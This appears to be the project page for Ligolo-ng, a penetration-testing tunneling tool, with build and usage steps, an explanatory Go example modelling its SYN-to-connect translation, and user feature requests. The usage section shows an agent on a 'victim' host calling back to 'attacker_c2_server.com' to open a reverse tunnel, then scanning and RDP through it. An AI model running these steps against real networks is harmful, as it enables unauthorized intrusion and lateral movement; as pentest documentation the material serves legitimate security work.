An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.

Overview

Ligolo-ng : Tunneling like a VPN


An advanced, yet simple, tunneling tool that uses a TUN interface.

by TNP IT Security


Introduction

Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels over a reverse TCP/TLS connection without the need for SOCKS.

Features

  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with LetsEncrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using gVisor.

When the relay/proxy server is running, a TUN interface is used: packets sent to this interface are translated and then transmitted to the agent's remote network.

As an example, for a TCP connection:

  • A SYN is translated to a connect() on the remote side
  • A SYN-ACK is sent back if connect() succeeds
  • A RST is sent if connect() fails with ECONNRESET, ECONNABORTED or ECONNREFUSED
  • Nothing is sent on timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).

Building & Usage

Building Ligolo-ng

Building ligolo-ng:

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build agent for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go

Setup Ligolo-ng

Start the proxy server on your Command and Control (C2) server (by default it listens on port 11601):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

When using -autocert, the proxy will automatically request a certificate (using Letsencrypt) for attacker_c2_server.com when an agent connects.

Self-signed certificates (NOT RECOMMENDED)

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Self-signed certificates can be generated using the following command:

# NOT RECOMMENDED! Don't use self-signed certificates.
$ go run `go env GOROOT`/src/crypto/tls/generate_cert.go -ecdsa-curve P256 -ed25519 -host yourhostname.com

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

A session should appear on the proxy server.

INFO[0102] Agent joined. [email protected] remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng » session 
? Specify a session : 1 - [email protected] - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : [email protected]] » ifconfig 
[...]
┌─────────────────────────────────────────────┐
│ Interface 3                                 │
├──────────────┬──────────────────────────────┤
│ Name         │ wlp3s0                       │
│ Hardware MAC │ de:ad:be:ef:ca:fe            │
│ MTU          │ 1500                         │
│ Flags        │ up|broadcast|multicast       │
│ IPv4 Address │ 192.168.0.30/24              │
└──────────────┴──────────────────────────────┘

Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

$ sudo ip route add 192.168.0.0/24 dev ligolo

Start the tunnel on the proxy:

[Agent : [email protected]] » start
[Agent : [email protected]] » INFO[0690] Starting tunnel to [email protected]   

You can now access the 192.168.0.0/24 agent network from the proxy server.

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

Agent Binding/Listening

You can listen on ports on the agent and redirect incoming connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example creates a TCP listening socket on the agent (0.0.0.0:1234) and redirects connections to port 4321 of the proxy server.

[Agent : [email protected]] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!            

On the proxy:

$ nc -lvp 4321

When a connection is made to TCP port 1234 on the agent, nc receives that connection.

This is very useful when using reverse TCP/UDP payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : [email protected]] » listener_list 
┌───────────────────────────────────────────────────────────────────────────────┐
│ Active listeners                                                              │
├───┬─────────────────────────┬────────────────────────┬────────────────────────┤
│ # │ AGENT                   │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
│ 0 │ [email protected] │ 0.0.0.0:1234           │ 127.0.0.1:4321         │
└───┴─────────────────────────┴────────────────────────┴────────────────────────┘

[Agent : [email protected]] » listener_stop 0
INFO[1505] Listener closed.                             

Demo

Demo video: ligolo-ng_demo.mp4

Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)

Performance

You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200 Mbits/s server to a 200 Mbits/s connection.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[  5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval           Transfer     Bitrate         Retr  Cwnd
[  5]   0.00-1.00   sec  12.5 MBytes   105 Mbits/sec    0    164 KBytes       
[  5]   1.00-2.00   sec  12.7 MBytes   107 Mbits/sec    0    263 KBytes       
[  5]   2.00-3.00   sec  12.4 MBytes   104 Mbits/sec    0    263 KBytes       
[  5]   3.00-4.00   sec  12.7 MBytes   106 Mbits/sec    0    263 KBytes       
[  5]   4.00-5.00   sec  13.1 MBytes   110 Mbits/sec    2    134 KBytes       
[  5]   5.00-6.00   sec  13.4 MBytes   113 Mbits/sec    0    147 KBytes       
[  5]   6.00-7.00   sec  12.6 MBytes   105 Mbits/sec    0    158 KBytes       
[  5]   7.00-8.00   sec  12.1 MBytes   101 Mbits/sec    0    173 KBytes       
[  5]   8.00-9.00   sec  12.7 MBytes   106 Mbits/sec    0    182 KBytes       
[  5]   9.00-10.00  sec  12.6 MBytes   106 Mbits/sec    0    188 KBytes       
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bitrate         Retr
[  5]   0.00-10.00  sec   127 MBytes   106 Mbits/sec    2             sender
[  5]   0.00-10.08  sec   125 MBytes   104 Mbits/sec                  receiver

Caveats

Because the agent runs without privileges, it cannot forward raw packets. When you perform an Nmap SYN scan through the tunnel, a full TCP connect() is performed on the agent instead.

When using nmap, you should use --unprivileged or -PE to avoid false positives.
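The SYN-to-connect() translation described in the "How is this different" section and the caveat above (a SYN scan through the tunnel is really a connect() scan on the agent) can be modelled in a few lines. The following Go program is an added example written for this page, not Ligolo-ng's own code: translateSyn is a hypothetical helper that performs the connect() the agent would perform and maps the outcome onto the three reply classes the README lists (SYN-ACK on success, RST for ECONNRESET/ECONNABORTED/ECONNREFUSED, nothing on timeout); treating any other dial error as silence is an assumption of the example, since the README lists only those three errnos. demo runs it against a throwaway loopback listener standing in for a host on the agent's network, which also illustrates why the caveat matters: the probed service sees a fully completed handshake and logs an ordinary client connection, which is what a defender can look for (a burst of short-lived, completed connections from one internal host rather than half-open SYNs).

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"os"
	"syscall"
	"time"
)

// SynResult is the synthetic reply the relay would write back onto the TUN
// interface for the SYN that triggered the connect(). The three classes
// follow the README; the mapping code is this example's, not Ligolo-ng's.
type SynResult string

const (
	SynAck SynResult = "SYN-ACK" // connect() succeeded
	Rst    SynResult = "RST"     // ECONNRESET / ECONNABORTED / ECONNREFUSED
	Silent SynResult = "none"    // timeout (and, by assumption, any other error)
)

// translateSyn models what the agent side does with one inbound SYN: it runs a
// full TCP connect() to the destination and classifies the outcome. On success
// the connection is closed again at once, so only the handshake result is kept.
func translateSyn(dst string, timeout time.Duration) SynResult {
	conn, err := net.DialTimeout("tcp", dst, timeout)
	if err == nil {
		conn.Close()
		return SynAck
	}
	if errors.Is(err, syscall.ECONNREFUSED) ||
		errors.Is(err, syscall.ECONNRESET) ||
		errors.Is(err, syscall.ECONNABORTED) {
		return Rst
	}
	// Dial timeouts fall through here. Other errors (e.g. ENETUNREACH) are also
	// left unanswered: an assumption of this example, not stated by the README.
	return Silent
}

// DemoResult records what the probe saw for a listening port, how many
// connections the probed service actually accepted, and what the same port
// looks like once nothing listens on it any more.
type DemoResult struct {
	OpenPort   SynResult
	Accepted   int
	ClosedPort SynResult
}

// demo uses a constructed loopback listener as a stand-in for a service in the
// agent's network, so it runs offline. The accept goroutine is the service's
// point of view: it receives a completed handshake, not a half-open SYN.
func demo() (DemoResult, error) {
	var res DemoResult
	ln, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		return res, err
	}
	addr := ln.Addr().String()
	got := make(chan struct{}, 1)
	go func() {
		if c, e := ln.Accept(); e == nil {
			c.Close()
			got <- struct{}{}
		}
	}()
	res.OpenPort = translateSyn(addr, time.Second)
	select {
	case <-got:
		res.Accepted = 1
	case <-time.After(time.Second):
	}
	ln.Close()
	// Nothing listens on the port now, so connect() gets ECONNREFUSED -> RST.
	res.ClosedPort = translateSyn(addr, time.Second)
	return res, nil
}

func main() {
	res, err := demo()
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	fmt.Printf("listening port: %s (service accepted %d connection)\n", res.OpenPort, res.Accepted)
	fmt.Printf("closed port:    %s\n", res.ClosedPort)
}
```

Run it with go run; every address involved is loopback, so no network access is needed. The timeout branch is not exercised by demo because it cannot be triggered reliably without an unroutable network.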

Todo

  • Implement other ICMP error messages (this will speed up UDP scans);
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up);
  • Implement multi-platform proxy.

Credits

  • Nicolas Chatelain <nicolas.chatelain -at- tnpconsultants.com>

tnpitsecurity.com

Issues
  • Feature request: use ligolo without certificates

    I'd like to be able to use it on internal pentests or HackTheBox using only IP addresses, no domain names or certificates. This doesn't seem possible. Thanks

    enhancement
    opened by sdcampbell 5
  • [FEATURE REQUEST] Please create binary release

    Hello! Thanks for ligolo-ng. I tried to add ligolo-ng to https://github.com/devops-works/binenv but the project doesn't have a binary release. Please create a binary release.

    enhancement
    opened by patsevanton 1
  • app.go: fix typo

    opened by elohmeier 0
  • [FEATURE REQUEST] Administration web panel

    Hi,

    It would be great if you could have a web admin panel for ligolo-ng so users can manage sessions, start/stop the tunnel on each session, view ifconfig, etc.

    Is this of interest to you too? Any plans to add this feature?

    Regards.

    opened by davisaqueen 0
  • Exclusions handling on network error and disconnect

    If there are network errors, the agent exits (because of the yamux keepalive exclusion) but the server does not realize the session was aborted if the yamux session is broken. So you do not know the agent status until you try to interact with it. I think the agent should have some reconnection capability if yamux fails, and the server must handle this too.

    enhancement
    opened by virusvfv 0
  • Include windows version of proxy (server) for windows without TUN

    I would really appreciate it if you included a Windows version of the proxy (server) without using TUN, like the original ligolo does. I use other software to redirect all traffic to the proxy (server), and TUN isn't available on Windows. A TAP driver must be created on Windows, but I am far from an expert in this field.

    enhancement
    opened by dennyvsdev 3